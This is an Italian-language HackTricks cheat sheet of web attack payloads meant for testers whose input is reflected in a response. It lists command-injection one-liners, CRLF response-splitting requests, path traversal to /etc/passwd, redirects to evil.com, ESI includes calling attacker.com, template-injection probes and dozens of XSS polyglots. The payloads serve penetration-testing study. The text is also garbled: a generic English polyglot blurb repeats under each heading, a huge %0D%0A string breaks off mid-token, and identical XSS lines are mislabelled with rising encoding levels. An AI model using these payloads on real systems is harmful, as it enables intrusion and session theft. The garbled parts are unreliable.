Italian - Ht
HackTricks Training Twitter Linkedin Sponsor

Reflecting Techniques - PoCs and Polygloths CheatSheet

Impara l'hacking di AWS da zero a eroe con htARTE (HackTricks AWS Red Team Expert)!

Altri modi per supportare HackTricks:

Lo scopo di queste PoC e Poliglotti è fornire al tester un riassunto rapido delle vulnerabilità che può sfruttare se il suo input viene in qualche modo riflessa nella risposta.

Questa cheatsheet non propone un elenco esaustivo di test per ogni vulnerabilità, solo alcuni di base. Se stai cercando test più completi, accedi a ciascuna vulnerabilità proposta.

Non troverai iniezioni dipendenti dal Content-Type come XXE, poiché di solito le proverai tu stesso se trovi una richiesta che invia dati xml. Qui non troverai nemmeno iniezioni di database poiché, anche se alcuni contenuti potrebbero essere riflessi, dipende molto dalla tecnologia e dalla struttura del backend del database.

Elenco di Poliglotti

{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AND INJECTED TITLE </h1>
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

Iniezione di Template Lato Client

Test di base

{{7*7}}
[7*7]

Poliglotti

Polyglots are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. Here are some common polyglot file types and their characteristics:

  • HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript. They can be used to execute JavaScript code in the context of a web page, bypassing any client-side security measures.

  • PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript. They can be used to execute JavaScript code when opened in a PDF reader, potentially exploiting vulnerabilities in the reader software.

  • Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript. They can be used to execute JavaScript code when opened in an image viewer, bypassing any security measures that may be in place for image files.

  • ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript. They can be used to execute JavaScript code when extracted, potentially exploiting vulnerabilities in the ZIP extraction software.

  • XML/JavaScript Polyglots: These files can be interpreted as both XML and JavaScript. They can be used to execute JavaScript code when opened in an XML parser, potentially exploiting vulnerabilities in the parser software.

  • CSV/JavaScript Polyglots: These files can be interpreted as both CSV (Comma-Separated Values) and JavaScript. They can be used to execute JavaScript code when opened in a spreadsheet program, bypassing any security measures that may be in place for CSV files.

Polyglots can be created by carefully crafting the file structure and taking advantage of the different parsing rules for each file type. They can be used in various hacking scenarios, such as bypassing security filters, delivering malware, or executing arbitrary code.

{{7*7}}[7*7]

Injection di Comandi

Test di Base

;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)

Poliglotti

Polyglots are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. Here are some common polyglot file types and their characteristics:

  • HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript. They can be used to execute JavaScript code in the context of a web page, bypassing any client-side security measures.

  • PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript. They can be used to execute JavaScript code when opened in a PDF reader, potentially exploiting vulnerabilities in the reader software.

  • Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript. They can be used to execute JavaScript code when opened in an image viewer, potentially exploiting vulnerabilities in the viewer software.

  • ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript. They can be used to execute JavaScript code when extracted, potentially exploiting vulnerabilities in the extraction software.

  • XML/JavaScript Polyglots: These files can be interpreted as both XML and JavaScript. They can be used to execute JavaScript code when opened in an XML parser, potentially exploiting vulnerabilities in the parser software.

Polyglots can be created by carefully crafting the file structure and taking advantage of the similarities between different file formats. They require a deep understanding of the file formats involved and can be challenging to create. However, they can be powerful tools for bypassing security measures and executing malicious code.

1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/

CRLF

Test di base

HTTP Response Splitting

CRLF Injection

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0ASet-Cookie:%20test=test

HTTP Response Splitting - Location Header

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0ALocation:%20http://malicious.com

HTTP Response Splitting - Set-Cookie Header

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0ASet-Cookie:%20test=test

SMTP Response Splitting

CRLF Injection

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0AMAIL%20FROM:%20<test@example.com>

SMTP Response Splitting - MAIL FROM

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0AMAIL%20FROM:%20<test@example.com>

SMTP Response Splitting - RCPT TO

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0ARCPT%20TO:%20<test@example.com>

SMTP Response Splitting - DATA

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0ADATA

SMTP Response Splitting - Subject

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0ASubject:%20Test

SMTP Response Splitting - Content-Type

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0AContent-Type:%20text/html%0D%0A%0D%0A%3Chtml%3E%3Cbody%3E%3Ch1%3ETest%3C/h1%3E%3C/body%3E%3C/html%3E

LDAP Response Splitting

CRLF Injection

GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Referer: http://example.com/%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A%0D%0
```bash
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E

Markup Sospeso

Test di Base

<!-- HTML Comment -->
<!-- Commento HTML -->

<!-- HTML Comment with dangling markup -->
<!-- Commento HTML con markup sospeso -->

<!-- HTML Comment with dangling markup and unclosed tag -->
<!-- Commento HTML con markup sospeso e tag non chiuso -->

<!-- HTML Comment with dangling markup and unclosed tag and attribute -->
<!-- Commento HTML con markup sospeso, tag non chiuso e attributo -->

<!-- HTML Comment with dangling markup and unclosed tag and attribute and value -->
<!-- Commento HTML con markup sospeso, tag non chiuso, attributo e valore -->

<!-- HTML Comment with dangling markup and unclosed tag and attribute and value and quotation mark -->
<!-- Commento HTML con markup sospeso, tag non chiuso, attributo, valore e virgolette -->

<!-- HTML Comment with dangling markup and unclosed tag and attribute and value and quotation mark and equal sign -->
<!-- Commento HTML con markup sospeso, tag non chiuso, attributo, valore, virgolette e segno di uguale -->

<!-- HTML Comment with dangling markup and unclosed tag and attribute and value and quotation mark and equal sign and space -->
<!-- Commento HTML con markup sospeso, tag non chiuso, attributo, valore, virgolette, segno di uguale e spazio -->

<!-- HTML Comment with dangling markup and unclosed tag and attribute and value and quotation mark and equal sign and space and closing tag -->
<!-- Commento HTML con markup sospeso, tag non chiuso, attributo, valore, virgolette, segno di uguale, spazio e tag di chiusura -->
[//]: # (Markdown Comment)
[//]: # (Commento Markdown)

[//]: # (Markdown Comment with dangling markup)
[//]: # (Commento Markdown con markup sospeso)

[//]: # (Markdown Comment with dangling markup and unclosed tag)
[//]: # (Commento Markdown con markup sospeso e tag non chiuso)

[//]: # (Markdown Comment with dangling markup and unclosed tag and attribute)
[//]: # (Commento Markdown con markup sospeso, tag non chiuso e attributo)

[//]: # (Markdown Comment with dangling markup and unclosed tag and attribute and value)
[//]: # (Commento Markdown con markup sospeso, tag non chiuso, attributo e valore)

[//]: # (Markdown Comment with dangling markup and unclosed tag and attribute and value and quotation mark)
[//]: # (Commento Markdown con markup sospeso, tag non chiuso, attributo, valore e virgolette)

[//]: # (Markdown Comment with dangling markup and unclosed tag and attribute and value and quotation mark and equal sign)
[//]: # (Commento Markdown con markup sospeso, tag non chiuso, attributo, valore, virgolette e segno di uguale)

[//]: # (Markdown Comment with dangling markup and unclosed tag and attribute and value and quotation mark and equal sign and space)
[//]: # (Commento Markdown con markup sospeso, tag non chiuso, attributo, valore, virgolette, segno di uguale e spazio)

[//]: # (Markdown Comment with dangling markup and unclosed tag and attribute and value and quotation mark and equal sign and space and closing tag)
[//]: # (Commento Markdown con markup sospeso, tag non chiuso, attributo, valore, virgolette, segno di uguale, spazio e tag di chiusura)
<br><b><h1>THIS IS AND INJECTED TITLE </h1>

Inclusione di file/Traversamento di percorsi

Test di base

/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php

Reindirizzamento aperto / Server Side Request Forgery

Test di base

www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)

ReDoS

Test di base

<details>
  <summary>Test 1</summary>

  ```javascript
  /^([a-z])+$/i.test('a'.repeat(10**6))
Test 2
/^([a-z])+$/i.test('a'.repeat(10**7))
Test 3
/^([a-z])+$/i.test('a'.repeat(10**8))

```

Test avanzati

<details>
  <summary>Test 1</summary>

  ```javascript
  /^([a-z])+$/i.test('a'.repeat(10**9))
Test 2
/^([a-z])+$/i.test('a'.repeat(10**10))
Test 3
/^([a-z])+$/i.test('a'.repeat(10**11))

``` ```bash (\\w*)+$ ([a-zA-Z]+)*$ ((a+)+)+$ ``` ## [Inclusione lato server/Inclusione lato bordo](../server-side-inclusion-edge-side-inclusion-injection.md)

Test di base

<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Poliglotti

Polyglots are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. Here are some common polyglot file types and their characteristics:

  • HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript. They can be used to execute JavaScript code in the context of a web page, bypassing any client-side security measures.

  • PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript. They can be used to execute JavaScript code when opened in a PDF reader, potentially exploiting vulnerabilities in the reader software.

  • Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript. They can be used to execute JavaScript code when opened in an image viewer, bypassing any security measures that may be in place for image files.

  • ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript. They can be used to execute JavaScript code when extracted, potentially exploiting vulnerabilities in the ZIP extraction software.

  • XML/JavaScript Polyglots: These files can be interpreted as both XML and JavaScript. They can be used to execute JavaScript code when opened in an XML parser, potentially exploiting vulnerabilities in the parser software.

Polyglots can be created by carefully crafting the file structure and taking advantage of the different ways that file types are interpreted by different software. They can be used in various hacking scenarios, such as bypassing security filters, delivering malware, or executing arbitrary code.

<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Server Side Request Forgery

Gli stessi test utilizzati per l'Open Redirect possono essere utilizzati qui.

Server Side Template Injection

Test di base

${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}

Poliglotti

Polyglots are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. Here are some common polyglot file types and their characteristics:

  • HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript. They can be used to execute JavaScript code in the context of a web page, bypassing any client-side security measures.

  • PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript. They can be used to execute JavaScript code when opened in a PDF reader, potentially exploiting vulnerabilities in the reader software.

  • Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript. They can be used to execute JavaScript code when opened in an image viewer, bypassing any security measures that may be in place for image files.

  • ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript. They can be used to execute JavaScript code when extracted, potentially exploiting vulnerabilities in the ZIP extraction software.

  • Polyglot Shell Scripts: These files can be interpreted as both shell scripts and other file types, such as image files or PDFs. They can be used to execute arbitrary commands on a system when executed as a shell script.

Polyglots can be created by carefully crafting the file structure and content to conform to the specifications of multiple file types. This requires a deep understanding of the file formats involved and can be a complex process. However, once created, polyglots can be powerful tools for bypassing security measures and executing malicious code.

{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\

Iniezione lato server XSLT

Test di base

<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>

Poliglotti

Polyglots are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. Here are some common polyglot file types and their characteristics:

  • HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript. They can be used to execute JavaScript code in the context of a web page, bypassing any client-side security measures.

  • Image/Script Polyglots: These files can be interpreted as both images and scripts. They can be used to embed malicious code within an image file, allowing it to be executed when the image is opened.

  • PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript. They can be used to execute JavaScript code within a PDF document, potentially exploiting vulnerabilities in PDF readers.

  • ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript. They can be used to execute JavaScript code when the ZIP archive is opened, bypassing any security measures that may be in place.

  • Polyglot Shell Scripts: These files can be interpreted as both shell scripts and other file types, such as images or documents. They can be used to execute arbitrary commands on a target system, potentially leading to remote code execution.

Polyglots can be created by carefully crafting the file structure and taking advantage of the way different file types are parsed by different applications. They can be used in various hacking scenarios, such as bypassing security filters, delivering malware, or exploiting vulnerabilities.

<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>

XSS

Test di base

Test di base

<script>alert('XSS')</script>

Test di base con tag HTML

<IMG SRC="javascript:alert('XSS');">

Test di base con tag HTML e evento

<IMG SRC=javascript:alert('XSS')>

Test di base con tag HTML e evento in maiuscolo

<IMG SRC=JaVaScRiPt:alert('XSS')>

Test di base con tag HTML e evento in minuscolo

<IMG SRC=javascript:alert('XSS')>

Test di base con tag HTML e evento in codifica URL

<IMG SRC=javascript:alert('XSS')>

Test di base con tag HTML e evento in codifica URL con caratteri speciali

<IMG SRC=javascript:alert('XSS')>

Test di base con tag HTML e evento in codifica URL con caratteri speciali e spazi

<IMG SRC=javascript:alert('XSS')>

Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi e codifica HTML

<IMG SRC=javascript:alert('XSS')>

Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML e codifica URL

<IMG SRC=javascript:alert('XSS')>

Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL e codifica URL doppia

<IMG SRC=javascript:alert('XSS')>

Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL, codifica URL doppia e codifica URL tripla

<IMG SRC=javascript:alert('XSS')>

Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL, codifica URL doppia, codifica URL tripla e codifica URL quadrupla

<IMG SRC=javascript:alert('XSS')>

Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL, codifica URL doppia, codifica URL tripla, codifica URL quadrupla e codifica URL quintupla

<IMG SRC=javascript:alert('XSS')>

Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL, codifica URL doppia, codifica URL tripla, codifica URL quadrupla, codifica URL quintupla e codifica URL sestupla

<IMG SRC=javascript:alert('XSS')>

Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL, codifica URL doppia, codifica URL tripla, codifica URL quadrupla, codifica URL quintupla, codifica URL sestupla e codifica URL settupla

<IMG SRC=javascript:alert('XSS')>

Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL, codifica URL doppia, codifica URL tripla, codifica URL quadrupla, codifica URL quintupla, codifica URL sestupla, codifica URL settupla e codifica URL ottupla

<IMG SRC=javascript:alert('XSS')>

Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL, codifica URL doppia, codifica URL tripla, codifica URL quadrupla, codifica URL quintupla, codifica URL sestupla, codifica URL settupla, codifica URL ottupla e codifica URL nonupla

<IMG SRC=javascript:alert('XSS')>

Test di base con tag HTML e evento in codifica URL con caratteri speciali, spazi, codifica HTML, codifica URL, codifica URL doppia, codifica URL tripla, codifica URL quadrupla, codifica URL quintupla, codifica URL sestupla, codifica URL settupla, codifica URL ottupla, codifica URL nonupla e codifica URL decupla

<IMG SRC=javascript:alert('XSS')>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()

Poliglotti

Polyglots are files that can be interpreted as different file types depending on the context in which they are opened. This can be useful for bypassing security measures or executing malicious code. Here are some common polyglot file types and their characteristics:

  • HTML/JavaScript Polyglots: These files can be interpreted as both HTML and JavaScript. They can be used to execute JavaScript code in the context of a web page, bypassing any client-side security measures.

  • PDF/JavaScript Polyglots: These files can be interpreted as both PDF and JavaScript. They can be used to execute JavaScript code when opened in a PDF reader, potentially exploiting vulnerabilities in the reader software.

  • Image/JavaScript Polyglots: These files can be interpreted as both image files and JavaScript. They can be used to execute JavaScript code when opened in an image viewer, bypassing any security measures that may be in place for image files.

  • ZIP/JavaScript Polyglots: These files can be interpreted as both ZIP archives and JavaScript. They can be used to execute JavaScript code when extracted, potentially exploiting vulnerabilities in the ZIP extraction software.

  • XML/JavaScript Polyglots: These files can be interpreted as both XML and JavaScript. They can be used to execute JavaScript code when opened in an XML parser, potentially exploiting vulnerabilities in the parser software.

Polyglots can be created by carefully crafting the file structure and taking advantage of the different ways that file types are interpreted by different software. They can be used in various hacking scenarios, such as bypassing security filters, delivering malware, or executing arbitrary code.

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
